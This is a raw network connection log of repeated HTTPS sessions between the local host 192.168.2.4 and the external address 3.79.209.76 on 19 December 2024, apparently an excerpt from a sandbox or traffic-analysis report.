                                                              Dec 19, 2024 22:41:12.853056908 CET49792443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:12.853076935 CET49792443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:12.853086948 CET443497923.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:12.853127956 CET49792443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:12.853214025 CET443497923.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:12.853260040 CET49792443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:12.853323936 CET49792443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:12.853338003 CET443497923.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:12.976844072 CET49798443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:12.976931095 CET443497983.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:12.977020025 CET49798443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:12.977233887 CET49798443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:12.977267027 CET443497983.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:14.366244078 CET443497983.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:14.366342068 CET49798443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:14.366821051 CET49798443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:14.366847038 CET443497983.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:14.368479967 CET49798443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:14.368491888 CET443497983.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:15.076375961 CET443497983.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:15.076452017 CET443497983.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:15.076613903 CET443497983.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:15.076678991 CET49798443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:15.076678991 CET49798443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:15.076847076 CET49798443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:15.076889992 CET443497983.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:15.179878950 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:15.180010080 CET443498043.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:15.180093050 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:15.180339098 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:15.180377960 CET443498043.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:16.570631027 CET443498043.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:16.570708990 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:16.571115017 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:16.571141005 CET443498043.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:16.573234081 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:16.573246956 CET443498043.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:17.263071060 CET443498043.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:17.263133049 CET443498043.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:17.263169050 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:17.263202906 CET443498043.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:17.263221025 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:17.263250113 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:17.263276100 CET443498043.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:17.263335943 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:17.263595104 CET49804443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:17.263607979 CET443498043.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:17.368024111 CET49810443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:17.368065119 CET443498103.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:17.368284941 CET49810443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:17.368577957 CET49810443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:17.368613005 CET443498103.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:18.757770061 CET443498103.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:18.757915020 CET49810443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:18.777898073 CET49810443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:18.777924061 CET443498103.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:18.804085970 CET49810443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:18.804141998 CET443498103.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:19.467776060 CET443498103.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:19.467837095 CET443498103.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:19.467988968 CET443498103.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:19.468058109 CET49810443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:19.468058109 CET49810443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:19.468058109 CET49810443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:19.468175888 CET49810443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:19.468197107 CET443498103.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:19.586622953 CET49815443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:19.586718082 CET443498153.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:19.586808920 CET49815443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:19.587110996 CET49815443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:19.587136984 CET443498153.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:20.992093086 CET443498153.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:20.992197990 CET49815443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:20.992542982 CET49815443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:20.992571115 CET443498153.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:20.994261026 CET49815443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:20.994275093 CET443498153.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:21.705118895 CET443498153.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:21.705179930 CET443498153.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:21.705319881 CET443498153.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:21.705329895 CET49815443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:21.705331087 CET49815443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:21.705399990 CET49815443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:21.705686092 CET49815443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:21.705748081 CET443498153.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:21.820832014 CET49821443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:21.820919037 CET443498213.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:21.821254015 CET49821443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:21.821619987 CET49821443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:21.821729898 CET443498213.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:23.295591116 CET443498213.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:23.295778036 CET49821443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:23.296046972 CET49821443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:23.296076059 CET443498213.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:23.298161983 CET49821443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:23.298260927 CET443498213.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:24.178414106 CET443498213.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:24.178481102 CET443498213.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:24.178633928 CET443498213.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:24.178699017 CET49821443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:24.178699017 CET49821443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:24.178699017 CET49821443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:24.178800106 CET49821443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:24.178838015 CET443498213.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:24.289577961 CET49827443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:24.289611101 CET443498273.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:24.289693117 CET49827443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:24.289966106 CET49827443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:24.289977074 CET443498273.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:25.756244898 CET443498273.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:25.756441116 CET49827443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:25.756719112 CET49827443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:25.756727934 CET443498273.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:25.758479118 CET49827443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:25.758485079 CET443498273.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:26.458389997 CET443498273.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:26.458481073 CET443498273.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:26.458561897 CET49827443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:26.458575010 CET443498273.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:26.458611965 CET49827443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:26.458666086 CET443498273.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:26.458709002 CET49827443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:26.458759069 CET49827443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:26.458774090 CET443498273.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:26.570640087 CET49833443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:26.570678949 CET443498333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:26.570780039 CET49833443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:26.571017027 CET49833443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:26.571023941 CET443498333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:28.056652069 CET443498333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:28.056725979 CET49833443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:28.057111025 CET49833443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:28.057120085 CET443498333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:28.058739901 CET49833443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:28.058746099 CET443498333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:29.198883057 CET443498333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:29.198951960 CET443498333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:29.199023008 CET49833443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:29.199035883 CET443498333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:29.199094057 CET49833443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:29.199100018 CET443498333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:29.199239969 CET49833443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:29.199246883 CET443498333.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:29.199256897 CET49833443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:29.305140972 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:29.305175066 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:29.305375099 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:29.305536985 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:29.305542946 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:30.693686008 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:30.693746090 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:30.694230080 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:30.694236994 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:30.696263075 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:30.696268082 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386111021 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386177063 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386204004 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386219978 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386233091 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386276960 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386282921 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386320114 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386336088 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386393070 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386629105 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386641026 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.492659092 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.492744923 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.492993116 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.493105888 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.493141890 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:32.903295040 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:32.903440952 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:32.903892040 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:32.903918982 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:32.905551910 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:32.905565977 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600423098 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600480080 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600502014 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600533962 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600552082 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600588083 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600595951 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600635052 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600660086 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600718021 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600744009 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600755930 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.711617947 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.711656094 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.711745024 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.712002039 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.712018013 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.111409903 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.111864090 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.112127066 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.112157106 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.114445925 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.114500046 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.805635929 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.805692911 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.805768013 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.805768967 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.805833101 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.805871964 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.805892944 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.805919886 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.840154886 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.840235949 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:36.213028908 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:36.213057041 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:36.213114977 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:36.240078926 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:36.240092993 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:37.633651972 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:37.633727074 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:37.634247065 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:37.634254932 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:37.636507988 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:37.636513948 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.367886066 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.367957115 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.367984056 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.367994070 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.368009090 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.368051052 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.368057013 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.368100882 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.368123055 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.368168116 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.368314981 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.368323088 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.783884048 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.783977985 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.784076929 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.784656048 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.784699917 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.233351946 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.233433962 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.233813047 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.233834982 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.235291004 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.235302925 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.937350035 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.937413931 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.937571049 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.937642097 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.939407110 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.939408064 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.939408064 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:41.054840088 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:41.054867029 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:41.055026054 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:41.055253983 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:41.055259943 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:42.446902037 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:42.446996927 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:42.447402954 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:42.447411060 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:42.449058056 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:42.449063063 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.149411917 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.149471045 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.149503946 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.149527073 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.149529934 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.149569035 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.149669886 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.149714947 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.149739027 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.149758101 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.258745909 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.258838892 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.258922100 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.259099960 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.259138107 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:44.649626970 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:44.649713993 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:44.650085926 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:44.650100946 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:44.652142048 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:44.652159929 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374532938 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374593973 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374608040 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374624014 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374648094 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374677896 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374684095 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374732971 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374784946 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374839067 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374944925 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374968052 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.492638111 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.492753029 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.492875099 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.493181944 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.493218899 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:46.891113043 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:46.891227007 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:46.891676903 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:46.891701937 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:46.894031048 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:46.894046068 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.591612101 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.591672897 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.591769934 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.591840029 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.591876984 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.591896057 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.591919899 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.592003107 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.592032909 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.696486950 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.696535110 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.696635008 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.696822882 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.696842909 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.085484982 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.085551977 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.086324930 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.086338043 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.088814974 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.088819981 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.787978888 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.788037062 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.788064003 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788081884 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.788103104 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788150072 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788155079 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.788196087 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788201094 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.788247108 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788480043 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788492918 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.899035931 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.899079084 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.899166107 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.899488926 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.899502993 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.301052094 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.301111937 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.301573038 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.301584005 CET443498943.79.209.76192.168.2.4
